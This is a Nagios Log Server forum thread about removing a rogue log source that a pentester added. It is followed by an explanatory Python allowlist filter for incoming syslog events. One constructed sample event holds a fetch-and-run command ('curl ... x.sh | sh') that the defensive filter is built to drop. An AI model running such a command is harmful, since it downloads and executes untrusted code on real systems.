Remove Log Source?

This support forum board is for support questions relating to Nagios Log Server, our solution for managing and monitoring critical log data.
Groink
Posts: 1
Joined: Thu Jul 09, 2015 4:46 pm

Remove Log Source?

Post by Groink »

Hi, I'm evaluating NLS, running it as a VM and I'm really starting to see the value in using this in our environment. I have a really newb question, though: how do you remove log sources from NLS?

Here's my situation:

We are having a pentest conducted and one of the things they did was add their pentest machine to NLS and start sending commands for remote execution into the logs. It's pretty easy to add any machine to NLS if you know the URL to grab to install the script. I realize I could ask to get access to the machine and change its rsyslog config, but it is for all intents and purposes a rogue machine. I could also just blacklist the IP and MAC, but then I could possibly be doing that for a lot of IPs if it hops around.

So, is there a way to tell NLS "stop receiving logs from this machine"? And further, is there a way to validate what machines are added to NLS so that something like this doesn't happen for real?

Thank you!
tmcdonald
Posts: 9117
Joined: Mon Sep 23, 2013 8:40 am

Re: Remove Log Source?

Post by tmcdonald »

First off, glad you enjoy the product! We've gotten a lot of positive feedback since it was released and it's one of my personal favorites.

Regarding doing this within LS itself, you can always set up an input filter to drop logs from a specific source. However, doing so is effectively the same as firewalling, and you run into the same problem with ip-hopping. Unfortunately in a pentest situation, if they know what they are doing they will be able to get around any static blocks you have in place. And any dynamic blocks (like blocking based off a MAC or DNS name) are pretty simple to circumvent as well.
Former Nagios employee
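The reply above describes two mechanisms: an input filter that drops events from a given source (in Nagios Log Server this is done in the Logstash filter configuration, where a conditional on the event's host field can call `drop {}`), and the observation that any block keyed on a single IP, MAC or DNS name is easy to hop around. The following is an added example, not code from the original post and not Nagios Log Server's own filter syntax: it models the same decision in Python as an allowlist rather than a blocklist, so an unknown sender is dropped by default instead of having to be blocked one address at a time. The inventory, the sample syslog lines and the peer IPs are constructed for the example; the host-to-IP mapping is a hypothetical one.

```python
import re
from typing import Dict, FrozenSet, List, NamedTuple, Set, Tuple

# Constructed sample input: (peer IP the syslog packet arrived from, raw RFC 3164 line).
# The third line imitates the scenario in the question (a rogue host logging a command);
# the fourth claims to be web01 but arrives from an address web01 never uses.
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    ("10.0.0.11", "<13>Jul  9 16:46:01 web01 sshd[4120]: Accepted publickey for deploy from 10.0.0.5"),
    ("10.0.0.12", "<13>Jul  9 16:46:03 db01 postgres[881]: connection authorized: user=app"),
    ("10.0.9.99", "<13>Jul  9 16:46:05 pentest01 bash[777]: curl http://10.0.9.99/x.sh | sh"),
    ("10.0.9.98", "<13>Jul  9 16:46:07 web01 cron[5]: spoofed hostname from an unexpected peer"),
    ("10.0.0.11", "not a syslog line at all"),
]

# Hypothetical inventory of hosts allowed to send: hostname -> peer IPs it may send from.
# In practice this would come from a CMDB or the list of machines you deliberately enrolled.
INVENTORY: Dict[str, Set[str]] = {
    "web01": {"10.0.0.11"},
    "db01": {"10.0.0.12"},
}

# Minimal RFC 3164 shape: <PRI>MMM dd HH:MM:SS HOST MESSAGE
SYSLOG_RE = re.compile(r"^<(\d{1,3})>([A-Z][a-z]{2} [ \d]\d \d\d:\d\d:\d\d) (\S+) (.*)$")


class Verdict(NamedTuple):
    peer_ip: str
    host: str      # hostname claimed in the line, or "?" if not parsed
    action: str    # "keep" or "drop"
    reason: str


def classify(peer_ip: str, line: str, inventory: Dict[str, Set[str]],
             blocklist: FrozenSet[str] = frozenset()) -> Verdict:
    """Decide whether one received event is kept or dropped.

    Order of checks: explicit blocklist (the static block from the reply), then
    parseability, then the allowlist: the claimed host must be in the inventory
    AND the packet must come from an address the inventory assigns to that host,
    which catches a sender that merely spoofs a legitimate hostname.
    """
    if peer_ip in blocklist:
        return Verdict(peer_ip, "?", "drop", "peer on blocklist")
    m = SYSLOG_RE.match(line)
    if not m:
        return Verdict(peer_ip, "?", "drop", "unparseable syslog line")
    host = m.group(3)
    allowed_ips = inventory.get(host)
    if allowed_ips is None:
        return Verdict(peer_ip, host, "drop", "host not in inventory")
    if peer_ip not in allowed_ips:
        return Verdict(peer_ip, host, "drop", "peer IP does not match inventory for host")
    return Verdict(peer_ip, host, "keep", "ok")


def filter_events(events: List[Tuple[str, str]], inventory: Dict[str, Set[str]],
                  blocklist: FrozenSet[str] = frozenset()) -> List[Verdict]:
    """Apply classify() to every received event; this is the 'input filter' step."""
    return [classify(ip, line, inventory, blocklist) for ip, line in events]


def unknown_sources(events: List[Tuple[str, str]],
                    inventory: Dict[str, Set[str]]) -> List[Tuple[str, str]]:
    """Distinct (peer_ip, claimed host) pairs the inventory does not account for.

    This answers the second question in the thread: a periodic report of senders
    that nobody enrolled, so a rogue machine shows up for review instead of
    silently becoming a trusted log source.
    """
    seen: Set[Tuple[str, str]] = set()
    for v in filter_events(events, inventory):
        if v.action == "drop" and v.reason != "unparseable syslog line":
            seen.add((v.peer_ip, v.host))
    return sorted(seen)


if __name__ == "__main__":
    for v in filter_events(SAMPLE_EVENTS, INVENTORY):
        print(f"{v.action:4} {v.peer_ip:12} {v.host:10} {v.reason}")
    print("unenrolled senders:", unknown_sources(SAMPLE_EVENTS, INVENTORY))
```

The allowlist does not defeat the IP-hopping the reply warns about by itself: an attacker who can take over an inventoried address can still log as that host. What it changes is the default, so hopping to a new address yields a dropped event and an entry in the review report rather than accepted data. The peer IP must be taken from the transport (the UDP/TCP peer), not from any field inside the message, since everything inside the message is attacker-controlled.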